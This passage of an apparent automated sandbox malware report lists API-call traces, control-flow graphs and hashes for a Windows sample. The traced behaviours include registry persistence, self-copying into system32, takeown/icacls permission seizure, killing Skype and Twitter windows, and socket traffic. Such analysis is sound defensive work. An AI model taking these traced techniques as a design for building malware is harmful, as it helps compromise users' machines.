                                                                                                                                                                                                                                                        • Part of subcall function 00415547: Sleep.KERNEL32(000001F4), ref: 0041556E
                                                                                                                                                                                                                                                        • Part of subcall function 00415547: lstrcmpA.KERNEL32(00000000,00000000), ref: 0041559A
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00415AD5
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000190), ref: 00415ADC
                                                                                                                                                                                                                                                        • Part of subcall function 004155B7: SetFocus.USER32(?,?,?,00000190,?,76AF0F00,?,?,?,?,?,?,?,?,00415AF2,?), ref: 004155FA
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00415AF8
                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00415B08
                                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(00000000,0045985C), ref: 00415B14
                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000020), ref: 00415B23
                                                                                                                                                                                                                                                      • SetPriorityClass.KERNEL32(00000000), ref: 00415B2A
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00004E20), ref: 00415B35
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$Sleep$Show$lstrlen$Focus$lstrcpyn$ForegroundProcessRectlstrcat$ClassCurrentPriority$CountDesktopThreadTicklstrcmplstrcpywsprintf
                                                                                                                                                                                                                                                      • String ID: :%d$http://
                                                                                                                                                                                                                                                      • API String ID: 1001066556-2872252496
                                                                                                                                                                                                                                                      • Opcode ID: 5433a4a54e52b947ac002cc7042449f1cca0677e9c2ee8cddeb72ecb393f4da8
                                                                                                                                                                                                                                                      • Instruction ID: 1a0f13dbbb03e331f307676340b79c983e3ef856dc49174a57c53eedfa74bf4b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5433a4a54e52b947ac002cc7042449f1cca0677e9c2ee8cddeb72ecb393f4da8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CEA1F972901704FBEB11BB60DD4AFEE376CAF55305F10006AFA04A1192DB7C9A86876E

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 1071 40d83e-40d865 GetTickCount call 421d78 call 410be0 1076 40d867-40d878 CreateThread Sleep 1071->1076 1077 40d87e-40d890 CreateThread 1071->1077 1076->1077 1078 40d892-40d898 1077->1078 1079 40d8a4-40d8a7 1077->1079 1078->1079 1080 40d89a-40d8a2 1078->1080 1081 40d8ac-40d8bb CreateThread GetTickCount 1079->1081 1080->1081 1082 40d8d2-40d8d8 1081->1082 1083 40d8da-40d8eb call 40f488 CreateThread 1082->1083 1084 40d8bd-40d8c5 GetTickCount 1082->1084 1088 40d8ed-40d8f4 call 40c15d 1083->1088 1084->1083 1085 40d8c7-40d8cc Sleep 1084->1085 1085->1082 1091 40d903-40d90d 1088->1091 1092 40d8f6-40d901 Sleep 1088->1092 1093 40d919-40d925 1091->1093 1094 40d90f-40d914 call 41411e 1091->1094 1092->1088 1092->1091 1096 40d942-40d980 call 4140ca lstrcatA call 413a97 CreateThread 1093->1096 1097 40d927-40d93d call 421d82 call 410a09 1093->1097 1094->1093 1106 40d982-40d98c CreateThread 1096->1106 1107 40d98e-40d9d0 CreateThread * 5 1096->1107 1097->1096 1106->1107 1108 40d9d2-40d9d8 1107->1108 1109 40da0a-40da3f CreateThread * 4 call 410a09 call 410b43 1107->1109 1108->1109 1110 40d9da-40da08 CreateThread * 4 1108->1110 1114 40da44-40da4f Sleep call 40c15d 1109->1114 1110->1109 1116 40da54-40da59 call 40f488 1114->1116 1116->1114
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040D849
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,00415D7A,00000000,00000000,00000000), ref: 0040D871
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0001D4C0), ref: 0040D878
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00005F6F,00000000,00000000,00000000), ref: 0040D888
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_0000604A,00000000,00000000,00000000), ref: 0040D8AE
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040D8B0
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040D8BD
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0040D8CC
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_0000D016,00000000,00000000,00000000), ref: 0040D8E9
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00007530), ref: 0040D8F7
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(C:\Program Files (x86)\\WinRAR\rar.exe,\WinRAR\rar.exe), ref: 0040D957
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00001F9D,00000000,00000000,00000000), ref: 0040D978
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_0001272F,00000000,00000000,00000000), ref: 0040D98C
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00012FDD,00000000,00000000,00000000), ref: 0040D998
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000095B5,00000000,00000000,00000000), ref: 0040D9A4
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000116A8,00000000,00000000,00000000), ref: 0040D9B0
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00006B75,00000000,00000000,00000000), ref: 0040D9BC
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000056A7,00000000,00000000,00000000), ref: 0040D9C8
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00008CB0,00000000,00000000,00000000), ref: 0040D9E4
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000076C6,00000000,00000000,00000000), ref: 0040D9F0
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000073CE,00000000,00000000,00000000), ref: 0040D9FC
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000085CA,00000000,00000000,00000000), ref: 0040DA08
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00007DF4,00000000,00000000,00000000), ref: 0040DA14
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00011206,00000000,00000000,00000000), ref: 0040DA20
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000157A7,00000000,00000000,00000000), ref: 0040DA2C
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_0001C19E,00000000,00000000,00000000), ref: 0040DA38
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00A4CB80), ref: 0040DA49
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CreateThread$Sleep$CountTick$lstrcat
                                                                                                                                                                                                                                                      • String ID: C:\Program Files (x86)\\WinRAR\rar.exe$\WinRAR\rar.exe
                                                                                                                                                                                                                                                      • API String ID: 4190259895-2349457676
                                                                                                                                                                                                                                                      • Opcode ID: f7a52bcc0a8116c75882cc8cd0f963ec66a759b7a03b6c4eac6b932caffdbd01
                                                                                                                                                                                                                                                      • Instruction ID: b5e03ec3d1ab7aa72586ffd96dea160173fde5e76d96af4e3afdbc534cda32d7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f7a52bcc0a8116c75882cc8cd0f963ec66a759b7a03b6c4eac6b932caffdbd01
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6519DE0A4535CBEF22037B26CC6E3B2E0CDA517DD714043BB406710D289BC8C998A7E

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 004085DA
                                                                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(00000000,000000E6), ref: 00408634
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,00000000), ref: 00408661
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,0042A3B0), ref: 00408676
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,?), ref: 00408683
                                                                                                                                                                                                                                                      • RegCreateKeyExA.ADVAPI32(80000002,00000000,00000000,?,00000000), ref: 004086C9
                                                                                                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,00000000,?,?,00000000,00000004,?,00000004), ref: 004086F3
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,?,00000004), ref: 004086FC
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000001F4,?,?,00000000,00000004,?,00000004), ref: 00408707
                                                                                                                                                                                                                                                      • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 0040872A
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8,?,?,00000000,00000004,?,00000004), ref: 00408735
                                                                                                                                                                                                                                                        • Part of subcall function 004142EE: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,76AE83C0,76AE8A60), ref: 004142FE
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,00000000), ref: 00408778
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,0042A3B0), ref: 00408782
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,?), ref: 0040878F
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,00000000), ref: 004087D0
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,0042A3B0), ref: 004087DA
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,?), ref: 004087E7
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,C:\Windows\system32\), ref: 00408826
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,0042A3B0), ref: 00408830
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,?), ref: 0040883D
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,0042A3B0), ref: 00408886
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,?), ref: 00408893
                                                                                                                                                                                                                                                        • Part of subcall function 00413A97: GetFileAttributesA.KERNEL32(00000000,0040C71D,00000000), ref: 00413A9B
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,C:\Windows\system32\), ref: 004088D2
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,0042A3B0), ref: 004088DC
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,?), ref: 004088E9
                                                                                                                                                                                                                                                        • Part of subcall function 00408324: GetComputerNameA.KERNEL32(?,?), ref: 00408492
                                                                                                                                                                                                                                                        • Part of subcall function 00408324: lstrcatA.KERNEL32(?,00000001), ref: 004084A6
                                                                                                                                                                                                                                                        • Part of subcall function 00408324: lstrcatA.KERNEL32(?,?), ref: 004084FE
                                                                                                                                                                                                                                                        • Part of subcall function 00408324: lstrcatA.KERNEL32(?,0042A3B0), ref: 00408530
                                                                                                                                                                                                                                                        • Part of subcall function 00408324: lstrcatA.KERNEL32(?,00000001), ref: 0040853A
                                                                                                                                                                                                                                                        • Part of subcall function 00408324: CopyFileA.KERNEL32(0000007F,?,00000001), ref: 00408553
                                                                                                                                                                                                                                                        • Part of subcall function 00408324: SetFileAttributesA.KERNEL32(?,00000080), ref: 00408565
                                                                                                                                                                                                                                                        • Part of subcall function 00408324: Sleep.KERNEL32(00000001), ref: 00408583
                                                                                                                                                                                                                                                        • Part of subcall function 00408324: SetFileAttributesA.KERNEL32(0000007F,00000080), ref: 00408592
                                                                                                                                                                                                                                                        • Part of subcall function 00408324: DeleteFileA.KERNEL32(0000007F), ref: 00408595
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,C:\Windows\system32\), ref: 0040887C
                                                                                                                                                                                                                                                        • Part of subcall function 00408324: GetUserNameA.ADVAPI32(?,?), ref: 0040838E
                                                                                                                                                                                                                                                        • Part of subcall function 00408324: wsprintfA.USER32 ref: 004083B8
                                                                                                                                                                                                                                                        • Part of subcall function 00408324: ShellExecuteA.SHELL32(00000000,00000000,takeown,?,00000000,00000000), ref: 004083CD
                                                                                                                                                                                                                                                        • Part of subcall function 00408324: Sleep.KERNEL32(000007D0), ref: 004083D8
                                                                                                                                                                                                                                                        • Part of subcall function 00408324: wsprintfA.USER32 ref: 004083F2
                                                                                                                                                                                                                                                        • Part of subcall function 00408324: ShellExecuteA.SHELL32(00000000,00000000,icacls,?,00000000,00000000), ref: 00408407
                                                                                                                                                                                                                                                        • Part of subcall function 00408324: Sleep.KERNEL32(00000BB8), ref: 00408412
                                                                                                                                                                                                                                                        • Part of subcall function 00408324: lstrlenA.KERNEL32(?), ref: 00408425
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrcat$Sleeplstrcpy$File$AttributesExecuteShell$CreateNamewsprintf$CloseComputerCopyDeleteDirectorySnapshotToolhelp32UserValueWindowslstrlen
                                                                                                                                                                                                                                                      • String ID: C:\Windows\system32\
                                                                                                                                                                                                                                                      • API String ID: 3762291812-1520839452
                                                                                                                                                                                                                                                      • Opcode ID: 4225e2a9f6c30a0eb4da557927706b4a7f56f109547df7c5c5968730367a42af
                                                                                                                                                                                                                                                      • Instruction ID: c2cce530174d335f4e65662834358c013a2ccb5602420c717432df29190648c8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4225e2a9f6c30a0eb4da557927706b4a7f56f109547df7c5c5968730367a42af
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D891F1B291021C6ADB11E7E0DD45FEA77BCEB48714F5404BBF605F2081EA78AB84CB65

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 1316 405d79-405d9b Sleep IsWindowVisible 1317 405da1-405dd1 GetWindowTextA GetWindowThreadProcessId 1316->1317 1318 405f5f-405f6c 1316->1318 1319 405e22-405e2d 1317->1319 1320 405dd3-405de6 call 413761 1317->1320 1321 405e72-405e76 1319->1321 1322 405e2f-405e35 1319->1322 1320->1319 1332 405de8-405def 1320->1332 1326 405ea2-405eab 1321->1326 1327 405e78-405e87 call 413761 1321->1327 1324 405f08-405f0e 1322->1324 1325 405e3b-405e5c GetClassNameA call 413761 1322->1325 1324->1318 1330 405f10-405f16 1324->1330 1325->1324 1339 405e62-405e69 PostMessageA 1325->1339 1333 405ead 1326->1333 1334 405e6e 1326->1334 1341 405e89-405e9c call 413761 1327->1341 1342 405e9e 1327->1342 1330->1318 1336 405f18-405f2b call 413761 1330->1336 1332->1319 1338 405df1-405df5 1332->1338 1333->1322 1334->1321 1336->1318 1347 405f2d-405f47 GetWindowThreadProcessId 1336->1347 1338->1319 1343 405df7-405e1c ShowWindow PostMessageA SetWindowPos DestroyWindow 1338->1343 1344 405f57-405f59 ShowWindow 1339->1344 1341->1342 1350 405eaf-405ec4 call 421f60 1341->1350 1342->1326 1343->1319 1344->1318 1347->1318 1349 405f49-405f51 PostMessageA DestroyWindow 1347->1349 1349->1344 1353 405ed5-405ee4 ShowWindow PostMessageA EnableWindow 1350->1353 1354 405ec6-405ed3 ShowWindow PostMessageA 1350->1354 1355 405eea-405f06 SetWindowPos DestroyWindow 1353->1355 1354->1355 1355->1318
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000002), ref: 00405D85
                                                                                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 00405D93
                                                                                                                                                                                                                                                      • GetWindowTextA.USER32(?,?,00000080), ref: 00405DAD
                                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00405DBF
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00405DF9
                                                                                                                                                                                                                                                      • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 00405E04
                                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000001,00000000,00000001,00000001,00000080), ref: 00405E15
                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00405E1C
                                                                                                                                                                                                                                                      • GetClassNameA.USER32(?,?,00000020), ref: 00405E43
                                                                                                                                                                                                                                                      • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 00405E67
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00405EC6
                                                                                                                                                                                                                                                      • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 00405ED1
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00405ED5
                                                                                                                                                                                                                                                      • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 00405EE0
                                                                                                                                                                                                                                                      • EnableWindow.USER32(?,00000000), ref: 00405EE4
                                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000001,00000000,00000001,00000001,00000080), ref: 00405EF9
                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00405F00
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00405F59
                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(0042A784,776AC310,00000001,0042A784,0040DAA0,00000001,0042A784), ref: 00413799
                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(00000001), ref: 0041379F
                                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00405F37
                                                                                                                                                                                                                                                      • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 00405F4E
                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00405F51
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$MessagePost$Show$Destroy$ProcessThreadlstrlen$ClassEnableNameSleepTextVisible
                                                                                                                                                                                                                                                      • String ID: - $skype$tooltips_class32$twitter
                                                                                                                                                                                                                                                      • API String ID: 968148897-3706606202
                                                                                                                                                                                                                                                      • Opcode ID: 3976e576093891d2386c3fc19554f5d567771aff1a74ec8261fc56ca94719168
                                                                                                                                                                                                                                                      • Instruction ID: 54639c6e0f4210a215bb2e5edd6b10eb1cc48d076ecbf56d7b59a4990fe04e6e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3976e576093891d2386c3fc19554f5d567771aff1a74ec8261fc56ca94719168
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A151C1B1209705BFE620EF60EC89EAB379CEB05345F50043AF641912D1DB799E468B7E

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 1356 40f0e0-40f15b call 421df0 call 40eb47 1361 40f164-40f1a9 socket call 4138bc htons connect 1356->1361 1362 40f15d-40f15f 1356->1362 1366 40f455-40f45e closesocket 1361->1366 1367 40f1af-40f22b call 413410 wsprintfA lstrlenA send 1361->1367 1364 40f462-40f467 1362->1364 1369 40f460-40f461 1366->1369 1371 40f22e-40f26b select __WSAFDIsSet 1367->1371 1369->1364 1371->1366 1372 40f271-40f285 recv 1371->1372 1372->1366 1373 40f28b-40f291 1372->1373 1374 40f2b3-40f2c8 call 40ed0b 1373->1374 1375 40f293-40f296 1373->1375 1374->1366 1381 40f2ce-40f303 call 40ec29 1374->1381 1376 40f298-40f29d 1375->1376 1377 40f2ad-40f2ae 1375->1377 1376->1377 1379 40f29f-40f2a4 1376->1379 1377->1371 1379->1377 1382 40f2a6-40f2ab 1379->1382 1385 40f309-40f318 call 42203e 1381->1385 1386 40f39f-40f3b0 call 40ec29 1381->1386 1382->1374 1382->1377 1392 40f325-40f32c 1385->1392 1393 40f31a-40f31f 1385->1393 1386->1366 1391 40f3b6-40f3ca lstrcmpA 1386->1391 1391->1366 1394 40f3d0-40f40d select __WSAFDIsSet 1391->1394 1395 40f394-40f398 1392->1395 1396 40f32e-40f331 1392->1396 1393->1366 1393->1392 1394->1366 1397 40f40f-40f421 recv 1394->1397 1398 40f333-40f370 select __WSAFDIsSet 1395->1398 1399 40f39a 1395->1399 1396->1395 1400 40f423-40f429 1397->1400 1401 40f468-40f46b closesocket 1397->1401 1398->1366 1402 40f376-40f389 recv 1398->1402 1403 40f472-40f486 closesocket 1399->1403 1404 40f471 1400->1404 1405 40f42b-40f441 call 421db0 1400->1405 1401->1404 1402->1366 1406 40f38f-40f391 1402->1406 1403->1369 1404->1403 1405->1404 1409 40f443-40f448 1405->1409 1406->1395 1409->1394 1410 40f44a-40f44f 1409->1410 1410->1366 1410->1394
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0040EB47: lstrcpyA.KERNEL32(?,0042A7D4,?,0000000F,00000000,00000000,00000000,00000000,?,000000FA,%s/%s=%d,?,?), ref: 0040EB66
                                                                                                                                                                                                                                                        • Part of subcall function 0040EB47: lstrlenA.KERNEL32(00000000), ref: 0040EB8A
                                                                                                                                                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 0040F16C
                                                                                                                                                                                                                                                      • htons.WS2_32(?), ref: 0040F18E
                                                                                                                                                                                                                                                      • connect.WS2_32(?,?,00000010), ref: 0040F1A1
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 0040F1F7
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,00000000), ref: 0040F20A
                                                                                                                                                                                                                                                      • send.WS2_32(?,?,00000000), ref: 0040F21B
                                                                                                                                                                                                                                                      • select.WS2_32(?,00000001,00000000,00000000,?), ref: 0040F254
                                                                                                                                                                                                                                                      • __WSAFDIsSet.WS2_32(?,00000001), ref: 0040F262
                                                                                                                                                                                                                                                      • recv.WS2_32(?,?,00000001,00000000), ref: 0040F27C
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
